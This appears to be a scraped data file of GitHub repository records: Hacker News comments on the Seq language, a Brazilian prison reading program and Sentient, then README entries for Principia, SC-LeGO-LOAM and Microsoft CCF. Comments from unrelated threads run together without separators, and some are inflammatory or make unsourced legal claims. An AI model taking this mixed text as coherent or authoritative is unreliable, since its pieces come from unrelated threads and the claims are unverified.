Hi everyone, I\u2019m one of the developers on the Seq project \u2014 I was delighted to see it posted here!
We started this project with a focus on bioinformatics, but since then we\u2019ve added a lot of language features/libraries that have closed the gap with Python by a decent margin, and Seq today can be useful in other areas or even for general Python programs (although there are still limitations of course). We\u2019re in the process of creating an extensible / plugin-able Python compiler based on Seq that allow for other domain-extensions. The upcoming release also has some neat features like OpenMP integration (e.g. \u201c@par(num_threads=10) for i in range(N): \u2026\u201d will run the loop with 10 threads). Happy to answer any questions!This looks cool, I also love how easy the setup was considering lots of niche languages I try sometimes seem to have arcane setup steps and dependenciesAnd some used to knit themself to freedom:https://widerimage.reuters.com/story/prison-knittersIn India, there is a prison that has somewhat of a tradition of experimenting with unusual methods of behavioural change.\nLast time in 2015 it was Yoga:https://www.hindustantimes.com/india/shorter-terms-for-priso...An even more traditional way is known in Thailand, prison fights.\nOfficially:https://muaythai-world.com/muay-thai-thailand-prison-fights-...If anyone is interested in the wider topic, this subject is called bibliotherapy, and has a long history. This specific program was popularized in the early 1990s at the University of Massachusetts Dartmouth as an alternative probation sentencing program, and it was so successful it later branched out around the world. Key advocates include Robert Waxler, Jean Trounstine, and Mary Stephenson, and researchers Roger Jarjoura and Susan T. Krumholz.I expect it'll create an illicit trade of essay plans and verbal story tellersIf you are interested in the Brazilian prison system you should take a look into this:[1] - Retratos do C\u00e1rcere: https://vimeo.com/383384532, https://www.pandafilmes.com.br/portfolio/retratos-do-carcere\nThis is a series about inmates life's. It start giving a brief overview of the current state of Brazilian prison system, including some history to explain why it is this way. Then it go on to show what really means to be an inmate in Brazil. It shows the conditions inmates have to endure, the treatment inmate's family receives, the role religion has inside Brazilian prisons, etc.[2] - Central: O Poder das Fac\u00e7\u00f5es no Maior Pres\u00eddio do Brasil: https://www.youtube.com/watch?v=7lbSBVpo9JA\nThis is a documentary about the \"Pres\u00eddio Central\" (https://pt.wikipedia.org/wiki/Pres%C3%ADdio_Central_de_Porto...) which is the largest prison in the state of Rio Grande Do Sul. The prison is overcrowded and falling apart. It is considered one of the worsts active prisons in Brazil.[3] - Deus e o Diabo em Cima da Muralha: https://www.youtube.com/watch?v=VbTMV1-0BTk\nThis one follows Drauzio Varella, a famous physician, while he gives the last goodbye to the most infamous prison in Brazil(https://en.wikipedia.org/wiki/Carandiru_Penitentiary).Unfortunately I don't know if these are available in languages other than Portuguese.Pizza huthttps://www.youtube.com/watch?v=EvFa63DZGOsThis could be a bit discriminatory, Brazil has a high analphabetism rate, it will be worst in prison, I suppose.\nThe ones who can't read should be offered courses and maybe start with easy comics.This is such a condescending understanding of why most crime happens. 
Especially in a country with as much wealth disparity as Brazil.I am very confused at how it is expected that books are likely to reduce crime \u2013 we have a very well-read set of criminals operating in our world today; they are called white-collar criminals, they have gone to the top institutions, they have read plenty of books and it does not seemed to have improved the virtue of their moral character beyond making their plots more audacious.French philosopher Bernard Stiegler \"an important thinker on the effects of digital technology\" became a philosopher while studying in prison (for robbery):https://en.wikipedia.org/wiki/Bernard_StieglerHe wrote a book about it:https://en.wikipedia.org/wiki/Acting_Out_(book)At school we had a teacher who tried to make us read 10 books a year.\nYou could choose whatever book you wanted, and you had to write a small summary.\nSo every one headed to the school library and looked for the smallest books available.\nThe most popular book that every one read was called something like: \"Collection of letters from from my Grandfather\" and had around 50 to 70 pages and was very boring.\nMany also cheated by watching movie adaptations of books.Edit: This was back in the time when you could not go online and find dozens of book summaries within minutes.Maybe it was deliberate word play, but 'their' here refers to the prisoners, not the books, in case anyone else misinterpreted this headline to imply they were actually editing the books.As a Brazilian this why we have the largest number of homicides and one of highest rate of homicides ->https://en.wikipedia.org/wiki/List_of_countries_by_intention...What boils down is the Narco and crime sponsor policies that looks good on paper but on reality is made to free more prisoners.The govt likes it because \"feels good\" and reduce prisoner spending and looks good on UN stats.Lets by example say that I had a discussion with someone here and I killed him.If I am on the 10% solved murdered case I will be brought to justice.Then criminal justice will come:1. Was I caught in \"flagrante\" (up to 24h after crime)? No? Wait for judgment outside or wait for preventive prison;2. Do I have a job or a clean record? If yes wait for trial at home;3. Did I intent to kill? Yes go to trial, Then you may pay some damages (very low fees) and community service.Then comes trial. I am consider Guilty IF ONLY, IF ONLY when ALL resources and recurses of law were finished.It is normal to crimes prescribes after 20 year abusing courts but it is the law.So I lost all recurses and now I am in Jail. The maximum sentence is 30 years (Even if I kill 10 people).I have the right to intimate visit (I can have sex with my girlfriend/friend/wife).If I am studying I can leave to study.If I work each worked day another one is removed from my sentence.If I read a book too.Then If I have good \"behavior\" my sentence is reduced to 1/6.DO the math -> max 30 /6 -> 5 years - bonus points (book, studying) I am free in 2-3 years.Now check the link I posted above -> https://en.wikipedia.org/wiki/List_of_countries_by_intention...\n(click count, rate)\nBrazil is very humane with criminals but not with its victims.My lower middle class condo has electrified fences, armed guards, CCTV, patrols, bullet proof glasses it is like a prison.\nThe higher classes have more features.People with good meaning soul and big heart cannot comprehend that some people for whatever reasons feel pleasure in being evil and don't care about others life. 
Then they project their good meaning in laws and thus give more power to evil people do more evil until they die.Welcome to \"modern laws\" for just evolved homo sapiens.Short tangencial bit of history:A Brazilian called Paulo Freire came up with a method which consists of coming up with a short list of words related to the pupils' day-to-day. These words have to cover all the phonemes in Portuguese and the pupils would discuss them.He managed to teach adults to read very quickly. But, as talking about your reality was integral to the method, he got into trouble with the then military regime.They threw him into a military jail.One fine day an officer asked for his help because many of the recruits couldn't read.But that was precisely why he had been thrown into jail!Reading is good but asking the writing to be free of corrections sounds like a scamI read \"The 48 Laws of Power\", after reading that its very popular in prisons. I liked the book, can recommend. Would be interesting to know what else they're reading. I imagine prisoners are much more well read then the average population, and live with violence. Would be interesting to know their taste in books.Abolish prisons. Let all the paedos outWhat a mockery of justice. Can't wait until the bleeding hearts in the usa implement this policy stateside. Seeing as we are getting rid of bail because reality is racist why not just eliminate prisons entirely.Back in my day, we read books for free pizza. I don't know if they accomplished what they wanted or exactly what it was that they were trying to accomplish. I read quite a bit of non-fiction but very little fiction, with the exception of when I am traveling.Learning whether it's done through hands on experience, reading or watching/listening is a good thing.Like a few others have mentioned, I do wonder how big the marginal return in baking in these features is.From a quick look, stuff like FASTA/BAM parsing, translation, etc can be implemented in C-land a la numpy, and called from Python, right?A language like Swift would also support the addition of powerful user-defined operators, as in the case of Swift for TensorFlow[1].Language adoption is hard to drive, and I wonder if having domain-specific library calls built-in is worth the added effort for people in the field.[1] https://www.tensorflow.org/swiftHeterogeneous collections and no inheritance/polymorphism seems like a bad combination.As a former bioinformatician (if that\u2019s a word), I\u2019m not sure there\u2019s much value in this. There\u2019s high dispersion in the performance requirements of bioinformatics tools. The processes that need to be fast (alignment, BLAST, whatever, tree creation, etc) are already super fucking optimized (though, unfortunately, still slow). The things that don\u2019t need to be fast can use whatever you want (I used Haskell and Racket for my own tools at the time). Python is.. not the greatest. The major value add is the multitude of scientific libraries. If you\u2019re gonna throw that all away, why not just use something better? Things like Julia, OCaml, Haskell, etc. I personally think Julia is pretty dope and is what I would use today for bioinformatics research. Or maybe if I was feeling a little subversive, K/Q or J. Q\u2019s time-series database KDB+ could probably be used for sequences. And maybe even for great effect. And the performance would be off the charts!It seems like the purpose of this is Python without the performance penalty, which doesn\u2019t make much sense to me. 
I\u2019ve found Haskell absolutely perfect for bioinformatics as most operations you are doing are functional data transformations. Moreover, it\u2019s pretty damn fast if you need it to be.I\u2019ve been out of the field a long time though (Roche-454 was still the main workhorse at the time). But let me tell you, bioinformatics is/was a fucking shit-show. The tools and ecosystem are/were like Linux in the mid 90s: fucking terrible. And another language is just gonna make it worse.Obligatory \u201cthis name is already in use in this field\u201d post: Seq is the name of a very popular structured logging sink that provides a web app with a query language interface for searching through and graphing log streams, often paired with Serilog when used in the .NET world.Fascinating, but there exist already htslib [0] bindings for Python (and many other languages). htslib truly is the standard library with respect to high-throughput sequencing data file access, and with high level bindings, we can already write something like:```\nfor seq in bamfile:\n print(seq.pos)\n```\nor whatever.[0] https://github.com/samtools/htslibHmm, it's interesting that you have DNA base sequences support built in. But (you know someone was going to ask ;-) ) I don't see similar support for Amino Acid sequences, or encoding/decoding between the two. Is this a deliberate design choice?This is similar to Crystal?As a working biological data scientist... This is useless until a tool I need, which I can't get anywhere else, is written in it.My suggestion would be to rewrite some of the most popular tools, like bwa, in this language, and show the comparative performance etc.Then, write a comprehensive open source package with great documentation and maintenance in this language, to demonstrate to others your investment.Then, maybe, it will get some traction. But honestly, C, R and Java are so embedded it will be a hard road.It is like a Julia-Nim hybrid.I'm curious how this differentiates from Nim other than the builtin types for bfx stuff. Still cool either way and great to see something else joining this space.I don't really understand why to create a new language. But I like the improvements they made for the Python langAs someone who noodles around in python, and knows nothing about bioinformatics, this looks very interesting for the 'nice' things it does to basic python like forcing single type of returns, array controls. Its almost like a 'safer-python' set of constructs that would be of great use to the general python programmer. And the pipe operator is very cool.....gotta try that out soon.I made a short explainer video on the language here:https://youtu.be/5bk4Wc5Op2MHow does it compare to Futhark/J? I'm especially curious how it compares to calling Futhark from Python. Are there special data structures?Since in bioinformatics, some processes are vastly more time-consuming than others it is not clear what the benefit of designing a new language is as opposed to adding an optimized, C library into Python itself.What functionality would not work the same way if this were a python library?That being said, it is a neat and impressive effort, I do fear though that it will have a whole lot less uptake as now requires bioinformaticians to learn a third language (Python, R and now seq)Historically I note a similarity to the 'Mothur' and 'Qiime' split.'Mothur' is a dynamic language similar to 'seq' whereas 'Qiime' is Python glue across many libraries. 
Frankly, I like 'mothur' better, but 'Qiime' is whole lot more popular.I'm a bit surprised at all the negative comments here. I hope it isn't too discouraging for your team, because as author of a 50K LOC Python app (HashBackup), I could really use this! I love the Python language but sometimes the performance is a drag. For example, to plan a restore when the data isn't local, HashBackup has to traverse every block in every file to be restored and figure out when to load the block and when it can be released from the cache. This isn't particularly difficult, but for very large restores it requires long loops using large lists, arrays, and/or dicts. Parts are coded in Cython, and that works well for easily-isolated functions, but not so great for something like the restore plan that needs database access and is referenced during the restore.I ran a small 10M entry {int:int} dict benchmark. In Python 2.7, the test used 1.1GB of RAM and about 8 seconds. In D (fully compiled) the same test used 881MB and 7.4 seconds. Here's the D version: import std.stdio : writeln;\n\n int main() {\n int[int] map;\n\n foreach (i; 0..10_000_000)\n map[i] = i;\n\n foreach (i; 0..3) {\n foreach (j; 0..10_000_000) {\n map[j] = map[j] + 1;\n }\n }\n return 0;\n }\n\nIn Seq it ran in 5 seconds and used 395MB. Here's the test program and Seq run: map = dict[int,int]()\n for i in range(0,10000000):\n map[i] = i\n for i in range(3):\n for j in range(10000000):\n map[j] = map[j] + 1 \n print map[12345]\n\n [root@hbseq ~]# /usr/bin/time -v ./map\n 12348\n User time (seconds): 4.67\n System time (seconds): 0.55\n Percent of CPU this job got: 97%\n Elapsed (wall clock) time (h:mm:ss or m:ss): 0:05.36\n Maximum resident set size (kbytes): 395532\n\nLooks pretty great to me, especially if I don't have to do a major rewrite! I guess I could have hit a case where Seq happened to have a higher HT load for 10M entries and D just did a resize, so it would be good to run the same kind of test at a lot of different hash table sizes. But the Python results are pretty terrible space-wise.Why not just contribute to BioJulia[1][2] instead? It is a more mainstream language but the one that fits computational tasks better than Python.[1] https://biojulia.net/[2] https://github.com/BioJuliaIs it possible to write a python module with seq?I'm especially interested in how sequence searching and matching work in libraries like this. Seq has a \"match\" statement for this task, which implements ACGT characters and _ for a single wildcard base and \"...\" for multiple wildcard bases, and a recursive matching system I haven't quite grokked yet.Personally I'm more comfortable with a regular expression syntax, so would prefer \".\" and \".*\". Actually, even better than \".\" is \"N\" from the IUPAC notation: https://en.wikipedia.org/wiki/Nucleic_acid_notationThe IUPAC notation is nice because it standardises \"character classes\" for working with nucleic acid sequences. For example, \"B\" is \"[CGT]\".I wrote a module a while ago for searching nucleic acid sequences with regexps: https://metacpan.org/pod/Bio::RegexpWhen working with sequences there are a bunch of things to think about that aren't really obvious from other types of data (or at least weren't obvious to me!)Exhaustive search: Often a regexp can match in many ways, and most regexp systems don't provide a way to get a complete list of them all. Fortunately there is the Regexp::Exhaustive perl module which is what I used. The way this module works is pretty awesome. 
It adds a special \"FAIL\" directive to the end of a pattern, so that the match can be recorded and artificially failed, triggering the regexp engine's backtracking mechanism to back up and find the next match (if any).

Reverse complements: Because DNA is double-stranded (well, usually... this is biology after all) there is a \"complementary\" pattern on the first strand that corresponds to the pattern you are interested in on the other strand. You almost always need to search for both. And what's more, DNA is directional, so you actually need to search in the reverse direction for this complementary pattern. You can either reverse and complement your sequence (which Seq has a special ~ operator for, neat!) and search again, or reverse and complement the search pattern itself, assemble a single combined regexp (Regexp::Assemble module), and do a single scan over the data, which is what Bio::Regexp does.

Circular DNA: Some DNA (plasmids) is actually circular in shape, meaning the start is connected to the end. So a comprehensive search needs to check for cases where the desired patterns span the arbitrary location selected as the \"start\" in your sequence.
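To make the IUPAC and reverse-complement points from this comment concrete, here is a small Python sketch (not Bio::Regexp's or Seq's actual implementation; the helper names and the toy inputs are made up) that expands IUPAC codes into regex character classes and scans both strands:

```python
import re

# IUPAC nucleotide codes expanded to regex character classes (subset shown);
# e.g. 'B' really is '[CGT]' in the standard notation.
IUPAC = {'A': 'A', 'C': 'C', 'G': 'G', 'T': 'T',
         'R': '[AG]', 'Y': '[CT]', 'B': '[CGT]', 'N': '[ACGT]'}

COMPLEMENT = str.maketrans('ACGT', 'TGCA')

def iupac_to_regex(pattern: str) -> str:
    # 'BNT' -> '[CGT][ACGT]T'
    return ''.join(IUPAC[base] for base in pattern)

def revcomp(seq: str) -> str:
    # Reverse complement, the rough equivalent of Seq's ~ operator.
    return seq.translate(COMPLEMENT)[::-1]

def search_both_strands(pattern: str, seq: str):
    regex = re.compile(iupac_to_regex(pattern))
    hits = [(m.start(), '+') for m in regex.finditer(seq)]
    # Scan the reverse complement to catch matches on the other strand.
    hits += [(m.start(), '-') for m in regex.finditer(revcomp(seq))]
    return hits

print(search_both_strands('BNT', 'ACGTTACG'))  # [(1, '+'), (0, '-'), (5, '-')]
```

Note that re.finditer only reports non-overlapping matches; the exhaustive search described above would need the record-and-fail trick, or a capturing lookahead like (?=(...)), on top of this.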
This should be marketed as a language for genomics, not bioinformatics. There is more to bioinformatics than just genomics, but this language (at least the beginning of the docs that I looked at) seems to be marketed exclusively for genomics analysis. Not a knock on the project at all, but it doesn't seem like someone doing analysis on cell images is going to get much out of this language.

My personal impression isn't that bioinformatics needs a full language, but more tools in popular environments to lower the entry barrier for good software engineering practices. Every bioinformatics codebase I've looked at has been a downright mess. Basically an ad hoc collection of scripts that transform data this way, maybe rendering some graphs or such, relying on 100 unstated assumptions. Nothing is maintainable, and they often rely on messy approaches like loading your entire data set into memory (works fine for your 1-10GB data set, then not so much on a larger one), or what I would gently describe as mainframe compute in place of real software engineering.

Hi guys, one of the authors (Ibrahim) here! Thanks a lot for the comments --- we definitely appreciate them! A quick explanation of why we built Seq:
- We were not happy with the existing bioinformatics libraries, for various reasons. And honestly, while Julia is an amazing project (and we do talk to the Julia team from time to time, as they are located two floors above our office at MIT), it never 'clicked' with us or many other people in the field.
- While the main application domain is bioinformatics (that's where we came from), Seq is pretty much a strongly typed, statically compiled Python. One of the main goals we had was to push the boundaries of how much stuff in Python can be deduced by the compiler, as we loved Python's syntax (Seq is to Python as Crystal is to Ruby --- or at least that is what we are aiming for).
- We do not want people to learn a new language --- Seq should be pretty much a drop-in replacement for Python, at least for most scientific/bioinformatics software. There still remains a small gap, but we are actively working to close it.
- At some level, Python libraries cannot cut it, especially when dealing with next-gen sequencing data. Also, owning the whole stack gives us the control to perform low-level pipeline optimizations. A chief example is our prefetch statement, which is rather hard to implement in other languages.
Also, check out the paper (https://dl.acm.org/doi/10.1145/3360551) for more information. Let me know if you cannot access it for various reasons.

Response from the BioJulia developers: https://biojulia.net/post/seq-lang/. High-level points:
* they were able to reproduce the performance comparison between Seq and BioJulia
* BioJulia spends most of its time on these benchmarks validating and transcoding data into a more compact, efficient representation of gene sequences
* Seq, on the other hand, operates on the raw ASCII input data and does no validation
* BioJulia devs implemented Julia types representing gene sequences the same way as Seq does in less than 100 lines of Julia code [1]
* when using the same representation as Seq, BioJulia was significantly faster than Seq
* BioJulia devs were able to further optimize transcoding of gene sequences to get a 10x performance improvement [2]
* with these improvements BioJulia reaches similar performance to Seq while still doing validation and using less memory
The full post is well worth reading. For me the main takeaway is that there's no real need for a domain-specific language, at least not based on these results. Julia is already a great language for this kind of work, and you get C-like speed and JIT compilation for free.
[1] https://github.com/jakobnissen/SeqLangBenchmarks/blob/master...
[2] https://github.com/BioJulia/BioSequences.jl/issues/86

This is pretty neat. More about this: https://news.ycombinator.com/item?id=12429393

Prolog and Lambda Prolog are much more universal. See the Awesome Prolog [1] list for more resources and examples.
[1] https://github.com/klaussinani/awesome-prolog

So the webdev crowd have invented Prolog?

See also Tau Prolog, implemented in Javascript: http://tau-prolog.org/

Hey everyone, I'm really flattered by everyone's interest in the language. I had no expectation of that when I worked on it. I'm happy to try and answer questions, though my memory's a bit fuzzy now. I think the reason for this sudden interest was this self-referential Tweet by Robin Houston which used Sentient to construct a pangram: https://twitter.com/robinhouston/status/1177575725240639489?...
The best resource to understand the language is probably this podcast: https://whyarecomputers.com/4
I'm immensely grateful to Tom for coaxing me into recording it with him.

Something feels kind of \"right\" about this, in the same sense that machine learning techniques seem to be able to produce correct results. In my \"things that exist in Star Trek:TNG that we should be making more progress on\" list, I think that how we program is wrong for a great many use-cases. In the Star Trek fictional universe, you often see characters programming impossibly complex things very quickly. There's several episodes where a character will create a holodeck simulation simply by describing what they want and providing detail for the parts the computer got wrong, until the simulation is more or less what they want. I feel like in some cases we're starting to figure this out, like with GauGAN: https://www.youtube.com/watch?v=p5U4NgVGAwg
But what about other cases? Can we just sort of describe the output we want, feed in data, and have the computer more or less figure out the set of functions that produces what we're looking for?
Such a paradigm would basically allow anybody to make a huge array of one-off, ultra-custom, long-tail \"programs\" that solve extremely niche needs without needing to learn all the rigor of actually programming.

At first glance, this appears to be similar to languages like MiniZinc (https://www.minizinc.org/) and maybe AMPL (https://ampl.com/). That is, you describe a problem in some form of constraint-based programming language, and you send it to a solver to find the solution. Am I understanding this correctly? Or am I missing something? What are the differences between Sentient and MiniZinc etc.?

This is something that hardware verification languages like specman-e and systemverilog have been doing for decades.

Neat, but not the most illuminating introductory demo. Took me a few minutes to figure out the UI is filling in the blanks at runtime, and I still don't see how/where it assigns an index to \"members\", or how it reasons about \"members\" at all. Also confusing is declaring sum=0 instead of sum=?, since the program doesn't know what \"sum\" is until runtime. If I change the declaration to sum=10, does that change the runtime count?

Why does the subset sum example here seem to fail on '0'? Or is it just returning the empty set?

How is it different from other declarative variants?!

I get the plug-in SAT solver. Great. (In practice, SAT solvers need plenty of specialist tuning for non-toy problems.) Is it supposed to be somehow more readable than Prolog? Easier for building more complex rules? No snark intended. Genuinely interested. Related thread: https://news.ycombinator.com/item?id=12429393
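On the subset-sum question a few comments up: for a target of 0, the empty subset is always a valid answer, which is most likely what the demo is returning rather than failing. A brute-force Python sketch of the semantics (Sentient itself encodes the constraint for a SAT solver; this is just the naive enumeration equivalent):

```python
from itertools import chain, combinations

def subset_sums(numbers, target):
    # Enumerate every subset (the power set) and keep those hitting the target.
    all_subsets = chain.from_iterable(
        combinations(numbers, k) for k in range(len(numbers) + 1))
    return [s for s in all_subsets if sum(s) == target]

# The empty subset () sums to 0, so a target of 0 always succeeds trivially.
print(subset_sums([2, 4, 7], 0))   # [()]
print(subset_sums([2, 4, 7], 11))  # [(4, 7)]
```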
", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "mockingbirdnest/Principia", "link": "https://github.com/mockingbirdnest/Principia", "tags": ["ksp", "mod", "n-body", "gravitation", "n-body-simulator", "gravity", "kerbal", "kerbal-space-program", "kerbalspaceprogram"], "stars": 647, "description": "\ud835\udc5b-Body and Extended Body Gravitation for Kerbal Space Program", "lang": "C++", "repo_lang": "", "readme": "# Principia\n\n**[Horner](https://github.com/mockingbirdnest/Principia/wiki/Change-Log#horner), the January version of Principia, is available with support for 1.12.5. Download it [here for 1.8.1, 1.9.1, 1.10.1, 1.11.0, 1.11.1, 1.11.2, and 1.12.2 to 1.12.5](https://bit.ly/3D2LdxU).**\n\n**For the convenience of Chinese users, download from \u817e\u8baf\u5fae\u4e91: [Principia Horner for 1.8.1\u20141.12.5](https://share.weiyun.com/miEvYqaL).**\n\nPrincipia is a mod for Kerbal Space Program (KSP) which implements N-body and extended body gravitation. Instead of being within the sphere of influence of a single celestial body at any point in time, your vessels are influenced by all the celestials. This makes it possible to implement missions that are more complex and more realistic than in the stock game, especially if used in conjunction with a mod like RealSolarSystem, which has real-life celestials.\n\nN-body gravitation is more complex than the toy physics of the stock game. Therefore, before using the mod we recommend that you read the [concepts](https://github.com/mockingbirdnest/Principia/wiki/Concepts) document, which explains the most important parts of Principia. In particular, you should learn about the [plotting frame](https://github.com/mockingbirdnest/Principia/wiki/Concepts#plotting-frame) and [flight planning](https://github.com/mockingbirdnest/Principia/wiki/Concepts#flight-planning).\n\nYou might also want to go through our [tutorial](https://github.com/mockingbirdnest/Principia/wiki/A-guide-to-going-to-the-Mun-with-Principia), which shows how to go to the Mun with Principia in an energy-efficient manner. We also have a guide explaining how to use the support for [rendezvous](https://github.com/mockingbirdnest/Principia/wiki/A-guide-to-performing-low-orbit-rendezvous).\n\nThe [FAQ](https://github.com/mockingbirdnest/Principia/wiki/Installing,-reporting-bugs,-and-frequently-asked-questions) explains how to install, how to report bugs, and documents the known issues and limitations.\n\nThe [change log](https://github.com/mockingbirdnest/Principia/wiki/Change-Log) gives a fairly detailed description of the new features in each release.\n\nPrincipia is released on every [new moon](https://en.wikipedia.org/wiki/New_moon) with whatever features and bug fixes are ready at the time. This ensures relatively timely improvements and bug fixes.\n\nDownload the binary (Ubuntu, macOS, and Windows) [here for 1.8.1, 1.9.1, 1.10.1, 1.11.0, 1.11.1, 1.11.2, and 1.12.2 to 1.12.5](https://bit.ly/3D2LdxU). Or, if you don't trust our binary, [build the mod](https://github.com/mockingbirdnest/Principia/blob/master/documentation/Setup.md) from the [Horner](https://github.com/mockingbirdnest/Principia/releases/tag/2023012121-Horner) release.\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "irapkaist/SC-LeGO-LOAM", "link": "https://github.com/irapkaist/SC-LeGO-LOAM", "tags": ["loam", "lidar-slam", "odometry", "cpp", "pointcloud", "gtsam", "iros", "mapping", "slam", "lidar", "loop", "place-recognition", "mulran-dataset"], "stars": 646, "description": "LiDAR SLAM: Scan Context + LeGO-LOAM", "lang": "C++", "repo_lang": "", "readme": "# SC-LeGO-LOAM\n## NEWS (Nov, 2020)\n- A Scan Context integration for LIO-SAM, named [SC-LIO-SAM (link)](https://github.com/gisbi-kim/SC-LIO-SAM), is also released. \n\n## Real-time LiDAR SLAM: Scan Context (18 IROS) + LeGO-LOAM (18 IROS)\n- This repository is an example use-case of Scan Context C++, the LiDAR place recognition method, for LiDAR SLAM applications. \n- For more details on each algorithm, please refer to
\n Scan Context https://github.com/irapkaist/scancontext
\n LeGO LOAM https://github.com/facontidavide/LeGO-LOAM-BOR
\n- Just include `Scancontext.h`. For details, see the file `mapOptmization.cpp`. \n- This example is integrated with LOAM, but our simple module (i.e., `Scancontext.h`) can be easily integrated with any other key-frame-based odometry (e.g., wheel odometry or ICP-based odometry).\n- Current version: April, 2020. \n\n\n## Features \n- Light-weight: a single header and cpp file, named `Scancontext.h` and `Scancontext.cpp`.\n    - Our module uses a KD-tree via nanoflann; nanoflann is also a single-header library, and its file is included in our directory.\n- Easy to use: a user only needs to remember two API functions: `makeAndSaveScancontextAndKeys` and `detectLoopClosureID`.\n- Fast: the loop detector runs at 10-15 Hz (for a 20 x 60 size, 10 candidates).\n\n\n## Examples\n- Video 1: DCC (MulRan dataset)\n- Video 2: Riverside (MulRan dataset) \n- Video 3: KAIST (MulRan dataset) \n\n\n
\n\n\n## Scan Context integration\n\n- For implementation details, see `mapOptmization.cpp`; all other files are the same as in the original LeGO-LOAM.\n- Some detailed comments:\n    - We use a non-conservative threshold for Scan Context's nearest distance, to maximise true-positive loop factors at the cost of an increased number of false positives.\n    - To prevent wrong map corrections, we used a Cauchy kernel (though DCS could also be used) for the loop factor. See `mapOptmization.cpp` for details (the original LeGO-LOAM used a non-robust kernel). We found that Cauchy is empirically sufficient.\n    - We use both types of loop factor additions: radius-search (RS)-based, as already implemented in the original LeGO-LOAM, and Scan Context (SC)-based global revisit detection. See `mapOptmization.cpp` for details. SC is good for correcting large drifts, and RS is good for fine-stitching.\n    - Originally, Scan Context supports reverse-loop closure (i.e., revisiting a place in the reversed direction); for examples, see py-icp slam. Our Scancontext.cpp module contains this feature. However, we did not use it for closing loops in this repository because we found PCL's ICP with a non-identity initial guess to be brittle. \n\n## How to use \n- Place the `SC-LeGO-LOAM` directory in your catkin workspace. \n- For example: \n    ```\n    cd ~/catkin_ws/src\n    git clone https://github.com/irapkaist/SC-LeGO-LOAM.git\n    cd ..\n    catkin_make\n    source devel/setup.bash\n    roslaunch lego_loam run.launch\n    ```\n\n## MulRan dataset \n- If you want to reproduce the results shown in the videos above, you can download the MulRan dataset and use the ROS topic publishing tool.\n\n\n## Dependencies\n- All dependencies are the same as for LeGO-LOAM (i.e., ROS, PCL, and GTSAM).\n- We used C++14 for std::make_unique in Scancontext.cpp, but you can use C++11 by slightly modifying only that part.\n\n## Cite SC-LeGO-LOAM\n```\n@INPROCEEDINGS { gkim-2018-iros,\n  author = {Kim, Giseop and Kim, Ayoung},\n  title = { Scan Context: Egocentric Spatial Descriptor for Place Recognition within {3D} Point Cloud Map },\n  booktitle = { Proceedings of the IEEE/RSJ International Conference on Intelligent Robots and Systems },\n  year = { 2018 },\n  month = { Oct. },\n  address = { Madrid }\n}\n```\nand \n```\n@inproceedings{legoloam2018,\n  title={LeGO-LOAM: Lightweight and Ground-Optimized Lidar Odometry and Mapping on Variable Terrain},\n  author={Shan, Tixiao and Englot, Brendan},\n  booktitle={IEEE/RSJ International Conference on Intelligent Robots and Systems (IROS)},\n  pages={4758-4765},\n  year={2018},\n  organization={IEEE}\n}\n```\n\n## Contact \n- Maintainer: Giseop Kim (`paulgkim@kaist.ac.kr`)\n\n## Misc notes\n- You may also be interested in this implementation (from the other author) :) \n    - ICRA20, ISCLOAM: Intensity Scan Context + LOAM, https://github.com/wh200720041/iscloam\n    - Also light-weight and practical LiDAR SLAM code! 
\n\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "microsoft/CCF", "link": "https://github.com/microsoft/CCF", "tags": ["confidentiality", "integrity", "cpp", "distributed-ledger", "governance", "javascript", "typescript", "framework"], "stars": 646, "description": "Confidential Consortium Framework", "lang": "C++", "repo_lang": "", "readme": "# The Confidential Consortium Framework [![Docs](https://img.shields.io/badge/Documentation-Up%20to%20date-green)](https://microsoft.github.io/CCF)\n\n\"ccf\"\n\n- Continuous Build: [![Build Status](https://dev.azure.com/MSRC-CCF/CCF/_apis/build/status/CCF%20Github%20CI?branchName=main)](https://dev.azure.com/MSRC-CCF/CCF/_build/latest?definitionId=3&branchName=main)\n- Daily Build: [![Build Status](https://dev.azure.com/MSRC-CCF/CCF/_apis/build/status/CCF%20GitHub%20Daily?branchName=main)](https://dev.azure.com/MSRC-CCF/CCF/_build/latest?definitionId=7&branchName=main)\n- Doc Build: [![docs](https://dev.azure.com/MSRC-CCF/CCF/_apis/build/status/CCF%20GitHub%20Pages?branchName=main)](https://dev.azure.com/MSRC-CCF/CCF/_build/latest?definitionId=4&branchName=main)\n- Containers: [![Build and Publish Release Containers](https://github.com/microsoft/CCF/actions/workflows/containers.yml/badge.svg)](https://github.com/microsoft/CCF/actions/workflows/containers.yml)\n\nThe [Confidential Consortium Framework (CCF)](https://ccf.dev/) is an open-source framework for building a new category of secure, highly available,\nand performant applications that focus on multi-party compute and data.\n\n## Get Started with CCF\n\n- Read the [CCF overview](https://ccf.microsoft.com/) and get familiar with [CCF's core concepts](https://microsoft.github.io/CCF/main/overview/what_is_ccf.html)\n- [Install](https://microsoft.github.io/CCF/main/build_apps/install_bin.html) CCF on Linux\n- Get familiar with CCF core developer API with the [template CCF app](https://github.com/microsoft/ccf-app-template)\n- Quickly build and run [sample CCF apps](https://github.com/microsoft/ccf-app-samples)\n- [Build new CCF applications](https://microsoft.github.io/CCF/main/build_apps/index.html) in TypeScript/JavaScript or C++\n\n## Contribute\n\n- [Contribute](https://microsoft.github.io/CCF/main/contribute) to this repository, following the [contribution guidelines](.github/CONTRIBUTING.md)\n- Submit [bugs](https://github.com/microsoft/CCF/issues/new?assignees=&labels=bug&template=bug_report.md&title=) and [feature requests](https://github.com/microsoft/CCF/issues/new?assignees=&labels=enhancement&template=feature_request.md&title=)\n- Start a [discussion](https://github.com/microsoft/CCF/discussions/new) to ask a question or propose an idea\n\n## Learn More\n\n- Browse the [documentation](https://microsoft.github.io/CCF/)\n- Read the [Research Papers](https://microsoft.github.io/CCF/main/research)\n- Learn more about [Azure Confidential Computing](https://azure.microsoft.com/solutions/confidential-compute/) offerings like Azure DC-series (which support Intel SGX TEE) and the [Open Enclave](https://github.com/openenclave/openenclave) SDK\n\n## Third-party components\n\nWe rely on several open source third-party components, attributed under [THIRD_PARTY_NOTICES](THIRD_PARTY_NOTICES.txt).\n\n## Contributing\n\nThis project welcomes contributions and suggestions. Please see the [Contribution guidelines](.github/CONTRIBUTING.md).\n", "readme_type": "markdown", "hn_comments": "Microsoft had a 'metaverse'? 
